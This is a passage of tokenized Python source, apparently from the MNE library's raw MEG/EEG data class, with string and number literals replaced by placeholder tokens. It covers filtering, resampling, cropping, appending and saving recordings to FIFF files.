<EOL> def __setitem__ ( self , item , value ) : <EOL> """<STR_LIT>""" <EOL> _check_preload ( self , '<STR_LIT>' ) <EOL> sel , start , stop = self . _parse_get_set_params ( item ) <EOL> self . _data [ sel , start : stop ] = value <EOL> def anonymize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . info . 
_anonymize ( ) <EOL> return self <EOL> @ verbose <EOL> def apply_function ( self , fun , picks , dtype , n_jobs , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> _check_preload ( self , '<STR_LIT>' ) <EOL> if picks is None : <EOL> picks = _pick_data_channels ( self . info , exclude = [ ] , <EOL> with_ref_meg = False ) <EOL> if not callable ( fun ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> data_in = self . _data <EOL> if dtype is not None and dtype != self . _data . dtype : <EOL> self . _data = self . _data . astype ( dtype ) <EOL> if n_jobs == <NUM_LIT:1> : <EOL> for idx in picks : <EOL> self . _data [ idx , : ] = _check_fun ( fun , data_in [ idx , : ] , <EOL> * args , ** kwargs ) <EOL> else : <EOL> parallel , p_fun , _ = parallel_func ( _check_fun , n_jobs ) <EOL> data_picks_new = parallel ( p_fun ( fun , data_in [ p ] , * args , ** kwargs ) <EOL> for p in picks ) <EOL> for pp , p in enumerate ( picks ) : <EOL> self . _data [ p , : ] = data_picks_new [ pp ] <EOL> @ verbose <EOL> def apply_hilbert ( self , picks , envelope = False , n_jobs = <NUM_LIT:1> , n_fft = None , <EOL> verbose = None ) : <EOL> """<STR_LIT>""" <EOL> n_fft = self . n_times if n_fft is None else n_fft <EOL> if n_fft < self . n_times : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if envelope is True : <EOL> self . apply_function ( _my_hilbert , picks , None , n_jobs , n_fft , <EOL> envelope = envelope ) <EOL> else : <EOL> self . apply_function ( _my_hilbert , picks , np . complex64 , n_jobs , <EOL> n_fft , envelope = envelope ) <EOL> @ verbose <EOL> def filter ( self , l_freq , h_freq , picks = None , filter_length = '<STR_LIT>' , <EOL> l_trans_bandwidth = <NUM_LIT:0.5> , h_trans_bandwidth = <NUM_LIT:0.5> , n_jobs = <NUM_LIT:1> , <EOL> method = '<STR_LIT>' , iir_params = None , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> fs = float ( self . 
info [ '<STR_LIT>' ] ) <EOL> if l_freq == <NUM_LIT:0> : <EOL> l_freq = None <EOL> if h_freq is not None and h_freq > ( fs / <NUM_LIT> ) : <EOL> h_freq = None <EOL> if l_freq is not None and not isinstance ( l_freq , float ) : <EOL> l_freq = float ( l_freq ) <EOL> if h_freq is not None and not isinstance ( h_freq , float ) : <EOL> h_freq = float ( h_freq ) <EOL> _check_preload ( self , '<STR_LIT>' ) <EOL> if picks is None : <EOL> picks = _pick_data_or_ica ( self . info ) <EOL> if len ( picks ) < <NUM_LIT:1> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if h_freq is not None : <EOL> if ( l_freq is None or l_freq < h_freq ) and ( self . info [ "<STR_LIT>" ] is None or <EOL> h_freq < self . info [ '<STR_LIT>' ] ) : <EOL> self . info [ '<STR_LIT>' ] = h_freq <EOL> if l_freq is not None : <EOL> if ( h_freq is None or l_freq < h_freq ) and ( self . info [ "<STR_LIT>" ] is None or <EOL> l_freq > self . info [ '<STR_LIT>' ] ) : <EOL> self . info [ '<STR_LIT>' ] = l_freq <EOL> else : <EOL> if h_freq is not None or l_freq is not None : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if l_freq is None and h_freq is not None : <EOL> logger . info ( '<STR_LIT>' % h_freq ) <EOL> low_pass_filter ( self . _data , fs , h_freq , <EOL> filter_length = filter_length , <EOL> trans_bandwidth = h_trans_bandwidth , method = method , <EOL> iir_params = iir_params , picks = picks , n_jobs = n_jobs , <EOL> copy = False ) <EOL> if l_freq is not None and h_freq is None : <EOL> logger . info ( '<STR_LIT>' % l_freq ) <EOL> high_pass_filter ( self . _data , fs , l_freq , <EOL> filter_length = filter_length , <EOL> trans_bandwidth = l_trans_bandwidth , method = method , <EOL> iir_params = iir_params , picks = picks , n_jobs = n_jobs , <EOL> copy = False ) <EOL> if l_freq is not None and h_freq is not None : <EOL> if l_freq < h_freq : <EOL> logger . info ( '<STR_LIT>' <EOL> % ( l_freq , h_freq ) ) <EOL> self . 
_data = band_pass_filter ( <EOL> self . _data , fs , l_freq , h_freq , <EOL> filter_length = filter_length , <EOL> l_trans_bandwidth = l_trans_bandwidth , <EOL> h_trans_bandwidth = h_trans_bandwidth , <EOL> method = method , iir_params = iir_params , picks = picks , <EOL> n_jobs = n_jobs , copy = False ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' <EOL> % ( h_freq , l_freq ) ) <EOL> self . _data = band_stop_filter ( <EOL> self . _data , fs , h_freq , l_freq , <EOL> filter_length = filter_length , <EOL> l_trans_bandwidth = h_trans_bandwidth , <EOL> h_trans_bandwidth = l_trans_bandwidth , method = method , <EOL> iir_params = iir_params , picks = picks , n_jobs = n_jobs , <EOL> copy = False ) <EOL> return self <EOL> @ verbose <EOL> def notch_filter ( self , freqs , picks = None , filter_length = '<STR_LIT>' , <EOL> notch_widths = None , trans_bandwidth = <NUM_LIT:1.0> , n_jobs = <NUM_LIT:1> , <EOL> method = '<STR_LIT>' , iir_params = None , mt_bandwidth = None , <EOL> p_value = <NUM_LIT> , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> fs = float ( self . info [ '<STR_LIT>' ] ) <EOL> if picks is None : <EOL> picks = _pick_data_or_ica ( self . info ) <EOL> if len ( picks ) < <NUM_LIT:1> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _check_preload ( self , '<STR_LIT>' ) <EOL> self . _data = notch_filter ( <EOL> self . 
_data , fs , freqs , filter_length = filter_length , <EOL> notch_widths = notch_widths , trans_bandwidth = trans_bandwidth , <EOL> method = method , iir_params = iir_params , mt_bandwidth = mt_bandwidth , <EOL> p_value = p_value , picks = picks , n_jobs = n_jobs , copy = False ) <EOL> return self <EOL> @ verbose <EOL> def resample ( self , sfreq , npad = None , window = '<STR_LIT>' , stim_picks = None , <EOL> n_jobs = <NUM_LIT:1> , events = None , copy = None , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if npad is None : <EOL> npad = <NUM_LIT:100> <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> DeprecationWarning ) <EOL> _check_preload ( self , '<STR_LIT>' ) <EOL> inst = _check_copy_dep ( self , copy ) <EOL> if events is None : <EOL> try : <EOL> original_events = find_events ( inst ) <EOL> except : <EOL> pass <EOL> sfreq = float ( sfreq ) <EOL> o_sfreq = float ( inst . info [ '<STR_LIT>' ] ) <EOL> offsets = np . concatenate ( ( [ <NUM_LIT:0> ] , np . cumsum ( inst . _raw_lengths ) ) ) <EOL> new_data = list ( ) <EOL> ratio = sfreq / o_sfreq <EOL> if stim_picks is None : <EOL> stim_picks = pick_types ( inst . info , meg = False , ref_meg = False , <EOL> stim = True , exclude = [ ] ) <EOL> stim_picks = np . asanyarray ( stim_picks ) <EOL> for ri in range ( len ( inst . _raw_lengths ) ) : <EOL> data_chunk = inst . _data [ : , offsets [ ri ] : offsets [ ri + <NUM_LIT:1> ] ] <EOL> new_data . append ( resample ( data_chunk , sfreq , o_sfreq , npad , <EOL> window = window , n_jobs = n_jobs ) ) <EOL> new_ntimes = new_data [ ri ] . shape [ <NUM_LIT:1> ] <EOL> if len ( stim_picks ) > <NUM_LIT:0> : <EOL> stim_resampled = _resample_stim_channels ( <EOL> data_chunk [ stim_picks ] , new_data [ ri ] . shape [ <NUM_LIT:1> ] , <EOL> data_chunk . shape [ <NUM_LIT:1> ] ) <EOL> new_data [ ri ] [ stim_picks ] = stim_resampled <EOL> inst . _first_samps [ ri ] = int ( inst . _first_samps [ ri ] * ratio ) <EOL> inst . _last_samps [ ri ] = inst . 
_first_samps [ ri ] + new_ntimes - <NUM_LIT:1> <EOL> inst . _raw_lengths [ ri ] = new_ntimes <EOL> inst . _data = np . concatenate ( new_data , axis = <NUM_LIT:1> ) <EOL> inst . info [ '<STR_LIT>' ] = sfreq <EOL> if inst . info . get ( '<STR_LIT>' ) is not None : <EOL> inst . info [ '<STR_LIT>' ] = min ( inst . info [ '<STR_LIT>' ] , sfreq / <NUM_LIT> ) <EOL> inst . _update_times ( ) <EOL> if events is None : <EOL> try : <EOL> resampled_events = find_events ( inst ) <EOL> if len ( resampled_events ) != len ( original_events ) : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> except : <EOL> pass <EOL> return inst <EOL> else : <EOL> if copy : <EOL> events = events . copy ( ) <EOL> events [ : , <NUM_LIT:0> ] = np . minimum ( <EOL> np . round ( events [ : , <NUM_LIT:0> ] * ratio ) . astype ( int ) , <EOL> inst . _data . shape [ <NUM_LIT:1> ] <EOL> ) <EOL> return inst , events <EOL> def crop ( self , tmin = <NUM_LIT:0.0> , tmax = None , copy = None ) : <EOL> """<STR_LIT>""" <EOL> raw = _check_copy_dep ( self , copy , default = True ) <EOL> max_time = ( raw . n_times - <NUM_LIT:1> ) / raw . info [ '<STR_LIT>' ] <EOL> if tmax is None : <EOL> tmax = max_time <EOL> if tmin > tmax : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if tmin < <NUM_LIT:0.0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> elif tmax > max_time : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % max_time ) <EOL> smin , smax = np . where ( _time_mask ( self . times , tmin , tmax , <EOL> sfreq = self . info [ '<STR_LIT>' ] ) ) [ <NUM_LIT:0> ] [ [ <NUM_LIT:0> , - <NUM_LIT:1> ] ] <EOL> cumul_lens = np . concatenate ( ( [ <NUM_LIT:0> ] , np . array ( raw . _raw_lengths , <EOL> dtype = '<STR_LIT:int>' ) ) ) <EOL> cumul_lens = np . cumsum ( cumul_lens ) <EOL> keepers = np . logical_and ( np . less ( smin , cumul_lens [ <NUM_LIT:1> : ] ) , <EOL> np . greater_equal ( smax , cumul_lens [ : - <NUM_LIT:1> ] ) ) <EOL> keepers = np . 
where ( keepers ) [ <NUM_LIT:0> ] <EOL> raw . _first_samps = np . atleast_1d ( raw . _first_samps [ keepers ] ) <EOL> raw . _first_samps [ <NUM_LIT:0> ] += smin - cumul_lens [ keepers [ <NUM_LIT:0> ] ] <EOL> raw . _last_samps = np . atleast_1d ( raw . _last_samps [ keepers ] ) <EOL> raw . _last_samps [ - <NUM_LIT:1> ] -= cumul_lens [ keepers [ - <NUM_LIT:1> ] + <NUM_LIT:1> ] - <NUM_LIT:1> - smax <EOL> raw . _raw_extras = [ r for ri , r in enumerate ( raw . _raw_extras ) <EOL> if ri in keepers ] <EOL> raw . _filenames = [ r for ri , r in enumerate ( raw . _filenames ) <EOL> if ri in keepers ] <EOL> if raw . preload : <EOL> raw . _data = raw . _data [ : , smin : smax + <NUM_LIT:1> ] . copy ( ) <EOL> raw . _update_times ( ) <EOL> return raw <EOL> @ verbose <EOL> def save ( self , fname , picks = None , tmin = <NUM_LIT:0> , tmax = None , buffer_size_sec = <NUM_LIT:10> , <EOL> drop_small_buffer = False , proj = False , fmt = '<STR_LIT>' , <EOL> overwrite = False , split_size = '<STR_LIT>' , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> check_fname ( fname , '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> split_size = _get_split_size ( split_size ) <EOL> fname = op . realpath ( fname ) <EOL> if not self . preload and fname in self . _filenames : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if self . preload : <EOL> if np . iscomplexobj ( self . _data ) : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> type_dict = dict ( short = FIFF . FIFFT_DAU_PACK16 , <EOL> int = FIFF . FIFFT_INT , <EOL> single = FIFF . FIFFT_FLOAT , <EOL> double = FIFF . FIFFT_DOUBLE ) <EOL> if fmt not in type_dict . 
keys ( ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> reset_dict = dict ( short = False , int = False , single = True , double = True ) <EOL> reset_range = reset_dict [ fmt ] <EOL> data_type = type_dict [ fmt ] <EOL> data_test = self [ <NUM_LIT:0> , <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> if fmt == '<STR_LIT>' and np . iscomplexobj ( data_test ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _check_fname ( fname , overwrite ) <EOL> if proj : <EOL> info = copy . deepcopy ( self . info ) <EOL> projector , info = setup_proj ( info ) <EOL> activate_proj ( info [ '<STR_LIT>' ] , copy = False ) <EOL> else : <EOL> info = self . info <EOL> projector = None <EOL> inv_comp = None <EOL> if self . comp is not None : <EOL> inv_comp = linalg . inv ( self . comp ) <EOL> set_current_comp ( info , self . _orig_comp_grade ) <EOL> start = int ( np . floor ( tmin * self . info [ '<STR_LIT>' ] ) ) <EOL> if tmax is None : <EOL> stop = self . last_samp + <NUM_LIT:1> - self . first_samp <EOL> else : <EOL> stop = int ( np . floor ( tmax * self . info [ '<STR_LIT>' ] ) ) <EOL> buffer_size = self . 
_get_buffer_size ( buffer_size_sec ) <EOL> _write_raw ( fname , self , info , picks , fmt , data_type , reset_range , <EOL> start , stop , buffer_size , projector , inv_comp , <EOL> drop_small_buffer , split_size , <NUM_LIT:0> , None ) <EOL> def plot ( self , events = None , duration = <NUM_LIT> , start = <NUM_LIT:0.0> , n_channels = <NUM_LIT:20> , <EOL> bgcolor = '<STR_LIT:w>' , color = None , bad_color = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> event_color = '<STR_LIT>' , scalings = None , remove_dc = True , order = '<STR_LIT:type>' , <EOL> show_options = False , title = None , show = True , block = False , <EOL> highpass = None , lowpass = None , filtorder = <NUM_LIT:4> , clipping = None ) : <EOL> """<STR_LIT>""" <EOL> return plot_raw ( self , events , duration , start , n_channels , bgcolor , <EOL> color , bad_color , event_color , scalings , remove_dc , <EOL> order , show_options , title , show , block , highpass , <EOL> lowpass , filtorder , clipping ) <EOL> @ verbose <EOL> def plot_psd ( self , tmin = <NUM_LIT:0.0> , tmax = <NUM_LIT> , fmin = <NUM_LIT:0> , fmax = np . 
inf , <EOL> proj = False , n_fft = <NUM_LIT> , picks = None , ax = None , <EOL> color = '<STR_LIT>' , area_mode = '<STR_LIT>' , area_alpha = <NUM_LIT> , <EOL> n_overlap = <NUM_LIT:0> , dB = True , show = True , n_jobs = <NUM_LIT:1> , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> return plot_raw_psd ( self , tmin = tmin , tmax = tmax , fmin = fmin , fmax = fmax , <EOL> proj = proj , n_fft = n_fft , picks = picks , ax = ax , <EOL> color = color , area_mode = area_mode , <EOL> area_alpha = area_alpha , n_overlap = n_overlap , <EOL> dB = dB , show = show , n_jobs = n_jobs ) <EOL> def plot_psd_topo ( self , tmin = <NUM_LIT:0.> , tmax = None , fmin = <NUM_LIT:0> , fmax = <NUM_LIT:100> , proj = False , <EOL> n_fft = <NUM_LIT> , n_overlap = <NUM_LIT:0> , layout = None , color = '<STR_LIT:w>' , <EOL> fig_facecolor = '<STR_LIT:k>' , axis_facecolor = '<STR_LIT:k>' , dB = True , <EOL> show = True , n_jobs = <NUM_LIT:1> , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> return plot_raw_psd_topo ( self , tmin = tmin , tmax = tmax , fmin = fmin , <EOL> fmax = fmax , proj = proj , n_fft = n_fft , <EOL> n_overlap = n_overlap , layout = layout , <EOL> color = color , fig_facecolor = fig_facecolor , <EOL> axis_facecolor = axis_facecolor , dB = dB , <EOL> show = show , n_jobs = n_jobs , verbose = verbose ) <EOL> def time_as_index ( self , times , use_first_samp = None , use_rounding = False ) : <EOL> """<STR_LIT>""" <EOL> if use_first_samp is None : <EOL> use_first_samp = False <EOL> else : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' , DeprecationWarning ) <EOL> index = super ( _BaseRaw , self ) . time_as_index ( times , use_rounding ) <EOL> if use_first_samp : <EOL> index -= self . first_samp <EOL> return index <EOL> @ deprecated ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def index_as_time ( self , index , use_first_samp = False ) : <EOL> """<STR_LIT>""" <EOL> return _index_as_time ( index , self . info [ '<STR_LIT>' ] , self . 
first_samp , <EOL> use_first_samp ) <EOL> def estimate_rank ( self , tstart = <NUM_LIT:0.0> , tstop = <NUM_LIT> , tol = <NUM_LIT> , <EOL> return_singular = False , picks = None , scalings = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> from . . cov import _estimate_rank_meeg_signals <EOL> start = max ( <NUM_LIT:0> , self . time_as_index ( tstart ) [ <NUM_LIT:0> ] ) <EOL> if tstop is None : <EOL> stop = self . n_times - <NUM_LIT:1> <EOL> else : <EOL> stop = min ( self . n_times - <NUM_LIT:1> , self . time_as_index ( tstop ) [ <NUM_LIT:0> ] ) <EOL> tslice = slice ( start , stop + <NUM_LIT:1> ) <EOL> if picks is None : <EOL> picks = _pick_data_channels ( self . info , exclude = '<STR_LIT>' , <EOL> with_ref_meg = False ) <EOL> if len ( picks ) == <NUM_LIT:1> : <EOL> return <NUM_LIT:1.0> , <NUM_LIT:1.0> <EOL> data = self [ picks , tslice ] [ <NUM_LIT:0> ] <EOL> out = _estimate_rank_meeg_signals ( <EOL> data , pick_info ( self . info , picks ) , <EOL> scalings = scalings , tol = tol , return_singular = return_singular ) <EOL> return out <EOL> @ property <EOL> def ch_names ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . info [ '<STR_LIT>' ] <EOL> @ property <EOL> def times ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _times <EOL> @ property <EOL> def n_times ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . last_samp - self . first_samp + <NUM_LIT:1> <EOL> def __len__ ( self ) : <EOL> return self . n_times <EOL> def load_bad_channels ( self , bad_file = None , force = False ) : <EOL> """<STR_LIT>""" <EOL> if bad_file is not None : <EOL> names = frozenset ( self . info [ '<STR_LIT>' ] ) <EOL> with open ( bad_file ) as fid : <EOL> bad_names = [ l for l in fid . read ( ) . splitlines ( ) if l ] <EOL> names_there = [ ci for ci in bad_names if ci in names ] <EOL> count_diff = len ( bad_names ) - len ( names_there ) <EOL> if count_diff > <NUM_LIT:0> : <EOL> if not force : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( bad_file , <EOL> self . 
_filenames [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> warn ( '<STR_LIT>' <EOL> % ( count_diff , bad_file , self . _filenames [ <NUM_LIT:0> ] ) ) <EOL> self . info [ '<STR_LIT>' ] = names_there <EOL> else : <EOL> self . info [ '<STR_LIT>' ] = [ ] <EOL> def append ( self , raws , preload = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( raws , list ) : <EOL> raws = [ raws ] <EOL> all_raws = [ self ] <EOL> all_raws += raws <EOL> _check_raw_compatibility ( all_raws ) <EOL> all_preloaded = self . preload and all ( r . preload for r in raws ) <EOL> if preload is None : <EOL> if all_preloaded : <EOL> preload = True <EOL> else : <EOL> preload = False <EOL> if preload is False : <EOL> if self . preload : <EOL> self . _data = None <EOL> self . preload = False <EOL> else : <EOL> nchan = self . info [ '<STR_LIT>' ] <EOL> c_ns = np . cumsum ( [ rr . n_times for rr in ( [ self ] + raws ) ] ) <EOL> nsamp = c_ns [ - <NUM_LIT:1> ] <EOL> if not self . preload : <EOL> this_data = self . _read_segment ( ) <EOL> else : <EOL> this_data = self . _data <EOL> if isinstance ( preload , string_types ) : <EOL> _data = np . memmap ( preload , mode = '<STR_LIT>' , dtype = this_data . dtype , <EOL> shape = ( nchan , nsamp ) ) <EOL> else : <EOL> _data = np . empty ( ( nchan , nsamp ) , dtype = this_data . dtype ) <EOL> _data [ : , <NUM_LIT:0> : c_ns [ <NUM_LIT:0> ] ] = this_data <EOL> for ri in range ( len ( raws ) ) : <EOL> if not raws [ ri ] . preload : <EOL> data_buffer = _data [ : , c_ns [ ri ] : c_ns [ ri + <NUM_LIT:1> ] ] <EOL> raws [ ri ] . _read_segment ( data_buffer = data_buffer ) <EOL> else : <EOL> _data [ : , c_ns [ ri ] : c_ns [ ri + <NUM_LIT:1> ] ] = raws [ ri ] . _data <EOL> self . _data = _data <EOL> self . preload = True <EOL> for r in raws : <EOL> self . _first_samps = np . r_ [ self . _first_samps , r . _first_samps ] <EOL> self . _last_samps = np . r_ [ self . _last_samps , r . _last_samps ] <EOL> self . _raw_extras += r . _raw_extras <EOL> self . _filenames += r . 
_filenames <EOL> self . annotations = _combine_annotations ( ( self . annotations , <EOL> r . annotations ) , <EOL> self . _last_samps , <EOL> self . _first_samps , <EOL> self . info [ '<STR_LIT>' ] ) <EOL> self . _update_times ( ) <EOL> if not ( len ( self . _first_samps ) == len ( self . _last_samps ) == <EOL> len ( self . _raw_extras ) == len ( self . _filenames ) ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return deepcopy ( self ) <EOL> def __repr__ ( self ) : <EOL> name = self . _filenames [ <NUM_LIT:0> ] <EOL> name = '<STR_LIT:None>' if name is None else op . basename ( name ) <EOL> s = ( '<STR_LIT>' <EOL> % ( name , len ( self . ch_names ) , self . n_times , self . times [ - <NUM_LIT:1> ] ) ) <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , s ) <EOL> def add_events ( self , events , stim_channel = None ) : <EOL> """<STR_LIT>""" <EOL> if not self . preload : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> events = np . asarray ( events ) <EOL> if events . ndim != <NUM_LIT:2> or events . shape [ <NUM_LIT:1> ] != <NUM_LIT:3> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> stim_channel = _get_stim_channel ( stim_channel , self . info ) <EOL> pick = pick_channels ( self . ch_names , stim_channel ) <EOL> if len ( pick ) == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' % stim_channel ) <EOL> pick = pick [ <NUM_LIT:0> ] <EOL> idx = events [ : , <NUM_LIT:0> ] . astype ( int ) <EOL> if np . any ( idx < self . first_samp ) or np . any ( idx > self . last_samp ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( self . first_samp , self . last_samp ) ) <EOL> if not all ( idx == events [ : , <NUM_LIT:0> ] ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . _data [ pick , idx - self . 
first_samp ] += events [ : , <NUM_LIT:2> ] <EOL> def _get_buffer_size ( self , buffer_size_sec = None ) : <EOL> """<STR_LIT>""" <EOL> if buffer_size_sec is None : <EOL> if '<STR_LIT>' in self . info : <EOL> buffer_size_sec = self . info [ '<STR_LIT>' ] <EOL> else : <EOL> buffer_size_sec = <NUM_LIT> <EOL> return int ( np . ceil ( buffer_size_sec * self . info [ '<STR_LIT>' ] ) ) <EOL> def _check_preload ( raw , msg ) : <EOL> """<STR_LIT>""" <EOL> if not raw . preload : <EOL> raise RuntimeError ( msg + '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _allocate_data ( data , data_buffer , data_shape , dtype ) : <EOL> """<STR_LIT>""" <EOL> if data is None : <EOL> if isinstance ( data_buffer , string_types ) : <EOL> data = np . memmap ( data_buffer , mode = '<STR_LIT>' , <EOL> dtype = dtype , shape = data_shape ) <EOL> else : <EOL> data = np . zeros ( data_shape , dtype = dtype ) <EOL> return data <EOL> def _index_as_time ( index , sfreq , first_samp = <NUM_LIT:0> , use_first_samp = False ) : <EOL> """<STR_LIT>""" <EOL> times = np . atleast_1d ( index ) + ( first_samp if use_first_samp else <NUM_LIT:0> ) <EOL> return times / sfreq <EOL> class _RawShell ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . first_samp = None <EOL> self . last_samp = None <EOL> self . _cals = None <EOL> self . _rawdir = None <EOL> self . _projector = None <EOL> @ property <EOL> def n_times ( self ) : <EOL> return self . last_samp - self . first_samp + <NUM_LIT:1> <EOL> def _write_raw ( fname , raw , info , picks , fmt , data_type , reset_range , start , <EOL> stop , buffer_size , projector , inv_comp , drop_small_buffer , <EOL> split_size , part_idx , prev_fname ) : <EOL> """<STR_LIT>""" <EOL> if part_idx > <NUM_LIT:0> : <EOL> base , ext = op . splitext ( fname ) <EOL> use_fname = '<STR_LIT>' % ( base , part_idx , ext ) <EOL> else : <EOL> use_fname = fname <EOL> logger . 
info ( '<STR_LIT>' % use_fname ) <EOL> fid , cals = _start_writing_raw ( use_fname , info , picks , data_type , <EOL> reset_range ) <EOL> first_samp = raw . first_samp + start <EOL> if first_samp != <NUM_LIT:0> : <EOL> write_int ( fid , FIFF . FIFF_FIRST_SAMPLE , first_samp ) <EOL> if part_idx > <NUM_LIT:0> and prev_fname is not None : <EOL> start_block ( fid , FIFF . FIFFB_REF ) <EOL> write_int ( fid , FIFF . FIFF_REF_ROLE , FIFF . FIFFV_ROLE_PREV_FILE ) <EOL> write_string ( fid , FIFF . FIFF_REF_FILE_NAME , prev_fname ) <EOL> if info [ '<STR_LIT>' ] is not None : <EOL> write_id ( fid , FIFF . FIFF_REF_FILE_ID , info [ '<STR_LIT>' ] ) <EOL> write_int ( fid , FIFF . FIFF_REF_FILE_NUM , part_idx - <NUM_LIT:1> ) <EOL> end_block ( fid , FIFF . FIFFB_REF ) <EOL> pos_prev = None <EOL> for first in range ( start , stop , buffer_size ) : <EOL> last = first + buffer_size <EOL> if last >= stop : <EOL> last = stop + <NUM_LIT:1> <EOL> if picks is None : <EOL> data , times = raw [ : , first : last ] <EOL> else : <EOL> data , times = raw [ picks , first : last ] <EOL> if projector is not None : <EOL> data = np . dot ( projector , data ) <EOL> if ( ( drop_small_buffer and ( first > start ) and <EOL> ( len ( times ) < buffer_size ) ) ) : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> break <EOL> logger . info ( '<STR_LIT>' ) <EOL> if pos_prev is None : <EOL> pos_prev = fid . tell ( ) <EOL> _write_raw_buffer ( fid , data , cals , fmt , inv_comp ) <EOL> pos = fid . 
tell ( ) <EOL> this_buff_size_bytes = pos - pos_prev <EOL> if this_buff_size_bytes > split_size / <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if pos > split_size : <EOL> warn ( '<STR_LIT>' ) <EOL> if pos >= split_size - this_buff_size_bytes - <NUM_LIT:2> ** <NUM_LIT:20> : <EOL> next_fname , next_idx = _write_raw ( <EOL> fname , raw , info , picks , fmt , <EOL> data_type , reset_range , first + buffer_size , stop , buffer_size , <EOL> projector , inv_comp , drop_small_buffer , split_size , <EOL> part_idx + <NUM_LIT:1> , use_fname ) <EOL> start_block ( fid , FIFF . FIFFB_REF ) <EOL> write_int ( fid , FIFF . FIFF_REF_ROLE , FIFF . FIFFV_ROLE_NEXT_FILE ) <EOL> write_string ( fid , FIFF . FIFF_REF_FILE_NAME , op . basename ( next_fname ) ) <EOL> if info [ '<STR_LIT>' ] is not None : <EOL> write_id ( fid , FIFF . FIFF_REF_FILE_ID , info [ '<STR_LIT>' ] ) <EOL> write_int ( fid , FIFF . FIFF_REF_FILE_NUM , next_idx ) <EOL> end_block ( fid , FIFF . FIFFB_REF ) <EOL> break <EOL> pos_prev = pos <EOL> if raw . annotations is not None : <EOL> start_block ( fid , FIFF . FIFFB_MNE_ANNOTATIONS ) <EOL> write_float ( fid , FIFF . FIFF_MNE_BASELINE_MIN , raw . annotations . onset ) <EOL> write_float ( fid , FIFF . FIFF_MNE_BASELINE_MAX , <EOL> raw . annotations . duration + raw . annotations . onset ) <EOL> write_name_list ( fid , FIFF . FIFF_COMMENT , [ d . replace ( '<STR_LIT::>' , '<STR_LIT:;>' ) for d in <EOL> raw . annotations . description ] ) <EOL> if raw . annotations . orig_time is not None : <EOL> write_double ( fid , FIFF . FIFF_MEAS_DATE , raw . annotations . orig_time ) <EOL> end_block ( fid , FIFF . FIFFB_MNE_ANNOTATIONS ) <EOL> logger . info ( '<STR_LIT>' % use_fname ) <EOL> if info . get ( '<STR_LIT>' , False ) : <EOL> end_block ( fid , FIFF . FIFFB_SMSH_RAW_DATA ) <EOL> else : <EOL> end_block ( fid , FIFF . FIFFB_RAW_DATA ) <EOL> end_block ( fid , FIFF . 
